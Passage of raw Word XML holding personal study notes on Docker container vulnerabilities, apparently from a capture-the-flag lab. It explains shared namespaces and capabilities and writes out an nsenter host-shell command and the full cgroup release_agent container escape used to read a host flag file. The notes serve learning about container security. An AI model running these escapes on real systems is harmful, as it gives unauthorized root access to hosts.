        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Vulerability #6 – Shared Namespaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1BFA87" w14:textId="206335A7" w:rsidR="00826000" w:rsidRDefault="00826000" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Container Isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190E0171" w14:textId="583DBAB5" w:rsidR="00826000" w:rsidRDefault="00826000" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>containers have networking capabilities and own file storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53309568" w14:textId="637CF84C" w:rsidR="00D05656" w:rsidRDefault="00D05656" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>achieved by using three components of Linux kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4E754B" w14:textId="34293864" w:rsidR="00D05656" w:rsidRDefault="00D05656" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Namespaces, Cgroups, OverlayFS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C652673" w14:textId="51DD5743" w:rsidR="00D05656" w:rsidRDefault="00D05656" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Namespaces segregate system resources such as processes, files, and memory away from other namespaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33699343" w14:textId="43CF829B" w:rsidR="00D05656" w:rsidRDefault="00D05656" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>every process running on Linux will be assigned namespace and process identifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD23E6B" w14:textId="4C4221FE" w:rsidR="00D05656" w:rsidRDefault="00D05656" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>namespaces are how containerization is achieved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201EE58B" w14:textId="27C992E8" w:rsidR="00D05656" w:rsidRDefault="00D05656" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>processes can only see the process that is in the same namespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1588F2" w14:textId="78D0D062" w:rsidR="00D05656" w:rsidRDefault="00D05656" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>every container will be running as a new namespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD73CBA" w14:textId="017C7ABF" w:rsidR="00D05656" w:rsidRDefault="00D05656" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>list processes running in Docker container using ps aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7D9F78" w14:textId="1D86D562" w:rsidR="00D05656" w:rsidRDefault="00D05656" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>indicator that currently in container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B4C31A" w14:textId="0F2B2DF7" w:rsidR="00D05656" w:rsidRDefault="00D05656" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Relevance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068F051F" w14:textId="24B2C0E9" w:rsidR="00D05656" w:rsidRDefault="00D05656" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>process ID of 0 is process that started when system boots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789F6A41" w14:textId="6A421A2D" w:rsidR="00D05656" w:rsidRDefault="00D05656" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>system/init is PID #1 and use this namespace on an OS to escalate privs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F318F4" w14:textId="35080AD0" w:rsidR="00D05656" w:rsidRDefault="00D05656" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>containers can use namespaces to coincide with the host computers processes, rather than isolated from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10939B6B" w14:textId="55ED787A" w:rsidR="00D05656" w:rsidRDefault="00D05656" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1233D343" w14:textId="50CF9C8F" w:rsidR="00D05656" w:rsidRDefault="00D05656" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">confirm container </w:t>
      </w:r>
      <w:r w:rsidR="00442DB7">
        <w:t>connected in namespaces of the host using ps aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B5F630" w14:textId="19071590" w:rsidR="00442DB7" w:rsidRDefault="00442DB7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>using nsenter command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD2FC0C" w14:textId="383C9C96" w:rsidR="00442DB7" w:rsidRDefault="00442DB7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>allows execution of start processes and place them within the same namespace as other processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084FF027" w14:textId="17157CDF" w:rsidR="00442DB7" w:rsidRDefault="00442DB7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>syntax. – nsenter - -target 1 - -mount sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E643A39" w14:textId="53B1D758" w:rsidR="00442DB7" w:rsidRDefault="00442DB7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>target value 1 to execute process in namespace of special system process ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689F20AF" w14:textId="6844A342" w:rsidR="00442DB7" w:rsidRDefault="00442DB7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>mount namespace of processes being target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C380F44" w14:textId="2B01FA11" w:rsidR="00442DB7" w:rsidRDefault="00442DB7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>sh executes shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E33698" w14:textId="3AC80EBA" w:rsidR="00442DB7" w:rsidRDefault="00442DB7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability #7 – Misconfigured Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E9D841" w14:textId="08511394" w:rsidR="00442DB7" w:rsidRDefault="00442DB7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Understanding Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2968CFBC" w14:textId="7F5EA24E" w:rsidR="00442DB7" w:rsidRDefault="00922504" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>User Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C85812C" w14:textId="5CD4FFCD" w:rsidR="00922504" w:rsidRDefault="00922504" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>interact with OS through Docker engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718714E5" w14:textId="72663FCD" w:rsidR="00922504" w:rsidRDefault="00922504" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Privileged Mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AA7DA1" w14:textId="54D9D5F2" w:rsidR="00922504" w:rsidRDefault="00922504" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>bypass Docker engine and have direct communication with OS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F198AE" w14:textId="1BE72EE7" w:rsidR="00922504" w:rsidRDefault="00922504" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Implication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFF1AA7" w14:textId="235B5A59" w:rsidR="00922504" w:rsidRDefault="00922504" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>execute commands as root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A5DD28" w14:textId="51744A94" w:rsidR="00922504" w:rsidRDefault="00922504" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>system packae such as libcap2-bin capsh to list capabilities container has</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755DE3D5" w14:textId="1A39A821" w:rsidR="00922504" w:rsidRDefault="00922504" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>capsh - -print</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F3AC31" w14:textId="77080FCA" w:rsidR="00922504" w:rsidRDefault="00922504" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cap_sys_chroot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B52B538" w14:textId="2DE0D116" w:rsidR="00922504" w:rsidRDefault="00922504" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cap_sys_module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C2160E" w14:textId="7ABA0B83" w:rsidR="00922504" w:rsidRDefault="00922504" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cap_net_admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E589075" w14:textId="48772158" w:rsidR="00922504" w:rsidRDefault="00922504" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>cap_sys_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D47065C" w14:textId="57750E84" w:rsidR="00922504" w:rsidRDefault="00922504" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>among others</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BABA1D" w14:textId="3F76244B" w:rsidR="00922504" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Search for Exploit using Grep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325B1CC6" w14:textId="68874D11" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>capsh - -print | grep sys_admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A484DB" w14:textId="656AA0CF" w:rsidR="00671D82" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId198" w:history="1">
        <w:r w:rsidR="00671D82" w:rsidRPr="00167DFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://linux.die.net/man/7/capabilities</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0AC0D777" w14:textId="5A360D5E" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>mount files from host OS into container</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ABBE91" w14:textId="0D730C7B" w:rsidR="00671D82" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId199" w:anchor=":~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so" w:history="1">
        <w:r w:rsidR="00671D82" w:rsidRPr="00167DFC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00671D82" w:rsidRPr="00671D82">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712987B0" w14:textId="764180A8" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>1. mkdir /tmp/cgrp &amp;&amp; mount -t cgroup -o rdma cgroup /tmp/cgrp &amp;&amp; mkdir /tmp/cgrp/x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B3E4F" w14:textId="1238AD0F" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>2.  echo 1 &gt; /tmp/cgrp/x/notify_on_release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1EE9E9" w14:textId="63E62C05" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>3.  host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EB4728" w14:textId="32E1A026" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>4.  echo "$host_path/exploit" &gt; /tmp/cgrp/release_agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0D8B8A" w14:textId="01D08E3F" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>5.  echo '#!/bin/sh' &gt; /exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A16025E" w14:textId="71CE6705" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>6.  echo "cat /home/cmnatic/flag.txt &gt; $host_path/flag.txt" &gt;&gt; /exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373DB9E0" w14:textId="3A307274" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>7.  chmod a+x /exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06627849" w14:textId="49F19961" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>8.  sh -c "echo \$\$ &gt; /tmp/cgrp/x/cgroup.procs"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5495EAE4" w14:textId="2CC678C4" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>create group to use Linux kernel to write and execute exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5513B432" w14:textId="2BC7CE31" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>mounted to /tmp/cgrp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3DF044" w14:textId="7C9CECD0" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>for exploit to execute, tell kernel by adding 1, tell kernel to execute once cgroup finishes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B35D782" w14:textId="1D8A410B" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>find where container files are stored on host and store as variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEE0FCC" w14:textId="1FCB8EC5" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>echo location of container files into exploit and release agent, executed by cgroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F30F002" w14:textId="271AD19F" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>turn exploit into shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE88CAA" w14:textId="2A06D1CE" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>execute a command to echo host flag into a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AB8E12" w14:textId="4CE48E48" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>make exploit executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77334CE0" w14:textId="4B0E0F71" w:rsidR="00671D82" w:rsidRDefault="00671D82" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>create process and store into tmp directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75733AEA" w14:textId="083352BB" w:rsidR="007D3682" w:rsidRDefault="007D3682" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Securing Containers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F9800A" w14:textId="6DFDE8E5" w:rsidR="007D3682" w:rsidRDefault="007D3682" w:rsidP="007F0512">
      <w:pPr>
